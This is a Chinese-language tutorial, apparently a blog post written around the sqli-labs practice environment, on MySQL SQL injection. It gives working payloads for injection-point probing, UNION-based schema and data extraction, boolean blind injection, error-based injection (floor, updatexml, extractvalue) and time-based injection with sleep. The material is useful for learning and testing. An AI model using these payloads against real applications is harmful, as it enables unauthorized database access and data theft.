MYSQL数据库,初始的时候会有四个数据库,information_schema,mysql,performance_schema与test。其中,information_schema这个数据库相当于目录,他存储了整个mysql中的所有数据库和数据表名称等信息,在sql注入中使用联合查询时用到的from information_schema.schemata就是从schemata这个数据表里面查询的。
对于sql注入,最关键的部分就是绕过,而对于绕过大部分都是通过使用不同的语句来实现的。
先判断是否有注入点(url中):
/?id=1--+
/?id=1'--+
/?id=0' or 1=1--+
/?id=1' and 1=0--+
确定之后就可以用相应的语句来进行注入了。
1. 排序:order by
基于sql语法的排序,根据by后面的数字来进行升序排序,或者通过使用desc来进行降序 排序。
2.联合查询:
pyload:/?id=0' union select 1,2,3--+
这个时最经典也是最方便的查询方式。首先,联合查询需要建立在有显示位的基础上。然后,输入id=0的原因是如果输入一个有意义的值,那么网页就会返回一个相应的值,这时,它会覆盖后面联合查询出的结果所以要用一个无意义的值来避免覆盖。后面的单引号属于绕过之后会提到。我们在知道显示位的时候可以在相应的位置写入希望查询的语句,例如sql-labs中一般只有第二个和第三个显示位,所以我们在2,3处写的语句就会被显示出来(你也可以试试将2或3修改为其他数字,例如22222或23333)。group_concat:将数据呈一行显示,有的时候数据过多没办法使用的时候可以用limit来对输出的数据进行限制。
db_name:你想查找的数据库的名字
tb_name:你想查找的数据表的名字
col_name:你想查找的字段的名字(字段=列)
查询所有数据库名:
payload:select group_concat(schema_name) from information_schema.schemata
查询当前数据库名:
payload:select database()
查询数据表名:
payload: select group_concat(table_name) from information_schema.tables where table_schema='db_name'
查询字段名:
payload: select group_concat(column_name) from infromation_schema.columns where table_schema='db_name' and table_name='tb_name'
查询数据:
payload: select group_concat(col_name) from db_name.tb_name
在查询的时候最好在两边加上括号,然后放入相应的位置就可。
3.盲注
1). mid()函数
mid(string,start,length)
(2). substr()函数
substr(string,start,length)
(3).left()函数
left(string,length)
string:规定要返回的字符串。
start:规定在字符串的何处开始(初始值为1)。
length:规定被返回字符串的长度(可以省略,若省略则返回剩余所有文本)。
在比较的时候可以直接使用单引号>‘s’,也可以先转换位ascii码的形式再进行比较。
布尔盲注的原理是根据页面返回的是true还是false来判断比较的字母是否正确。例如,如果数据库的第一个字母在ASCII表中小于与100相对应的字母,那么就会返回正常情况下的成功页面;如果不小于的话,就会返回错误的页面。
4.报错注入
(1).floor报错:
and (select 1 from(select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
该语句输出字符长度被限制为64个字符。
floor()函数原本为向下取整,其中rand()函数为随机数生成,不能于order by共用,数据记录必须有两条以上。
mysql在遇到 select count(*) from ... group by x这语句的时候会先建立一个虚表,然后开始查询数据,取数据库数据,然后查看虚拟表存在不存在,不存在则插入新记录,存在则count(*)字段直接加1,x是sql中暂时成为查询语句的虚拟表的字段名。
and的后面加了跨度很大的括号:优先后面的注入语句执行,后面的注入语句被优先执行,本身就计算出错然后就会直接报错,那么就没有前面的select语句的什么事儿了。我们可以简单的理解为语句短路。
感谢大佬的博客:https://blog.csdn.net/cried_cat/article/details/80022378
(2).updatexml报错:
and updatexml(1,payload,1)
该语句输出字符长度被限制为32个字符。
语句对payload的返回类型做了限制,只有在payload返回的不是xml格式才会生效,查询时使用的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,出现查询结果。
可以参考我的另一篇博客sqli-labs解题大法/Less-17:https://blog.csdn.net/weixin_43733035/article/details/86561654
(3).extractvalue()报错:
and extractvalue(1, payload)
该语句输出字符长度被限制为32个字符。
其中payload是想要输入的查询子句。
报错注入的原理:正常用户访问服务器时发送id信息返回正确的id数据。报错注入是想办法构造语句,让错误信息中可以显示数据库的内容;如果能让错误信息中返回数据库中的内容,即实现SQL注入。
5.延时注入
sleep(n):网页延迟n秒输出结果;
if(a,b,c):if判断句,a为条件,b、c为执行语句;如果a为真就执行b,a为假就执行c;
length(database()):返回当前数据库名长度;
延时注入常与mid(),substr(),left()三个函数结合使用,但是由于网速等原因,自我感觉没有布尔盲注好用。
当然,有的时候使用延时注入的语句时,会出现睡眠很久,远远超过五秒,甚至是五十、一百秒的。这个暂时还不知道怎么回事,等到解决了之后会继续将这篇文章更新完善,在此之前如果大家真的遇到这件事又无法解决了,还是推荐用布尔盲注,或者有谁知道怎么回事也请留言指点。